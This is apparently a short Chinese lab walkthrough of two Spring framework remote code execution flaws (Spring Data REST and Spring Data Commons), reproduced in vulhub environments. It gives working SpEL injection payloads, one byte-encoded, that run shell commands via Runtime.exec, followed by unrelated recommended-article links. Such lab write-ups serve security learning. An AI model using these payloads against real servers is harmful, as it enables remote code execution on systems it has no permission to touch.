常见框架漏洞—Spring

一.Spring Data Rest 远程命令执⾏命令

1.搭建环境

2.访问网站下的/customers/1

3.对当前页面进行抓包,修改提交方式为PATCH,内容类型为application/json-patch+json

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }

4.发现容器目录中有了succese

二.Spring代码执行

1.环境搭建

2.访问网站下的users目录

3.提交页面进行抓包,添加poc:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
ouch /tmp/crz")]=&password=&repeatedPassword=

4.查看终端,发现成功写入

相关推荐
肥仔哥哥193014 分钟前
基于OpenCv做照片分析(Java)
java·人工智能·opencv·图像原理
一枚小小程序员哈16 分钟前
基于Android的车位预售预租APP/基于Android的车位租赁系统APP/基于Android的车位管理系统APP
android·spring boot·后端·struts·spring·java-ee·maven
没有bug.的程序员18 分钟前
JVM 学习与提升路线总结:从入门到精通的系统化指南
java·jvm·学习·提升
用户307429716715821 分钟前
Spring AI实战:基于ElevenLabs 实现文本转语音的实时音频流
java·spring boot·ai编程
二闹27 分钟前
从@Transactional失效场景到传播行为原理
java·后端
赵星星52030 分钟前
synchronized锁的是谁,看完这篇就明白了
java·后端
小张学习之旅32 分钟前
线程池简单讲解
java·后端
叫我阿柒啊1 小时前
Java全栈开发面试实战:从基础到微服务的深度解析
java·jvm·微服务·vue3·springboot·全栈开发·restfulapi
许泽宇的技术分享1 小时前
当自然语言遇上数据库:Text2Sql.Net的MCP革命如何重新定义开发者与数据的交互方式
数据库·.net·text2sql·mcp
cxyxiaokui0011 小时前
检索增强生成(RAG):打破模型知识壁垒的革命性架构
java·aigc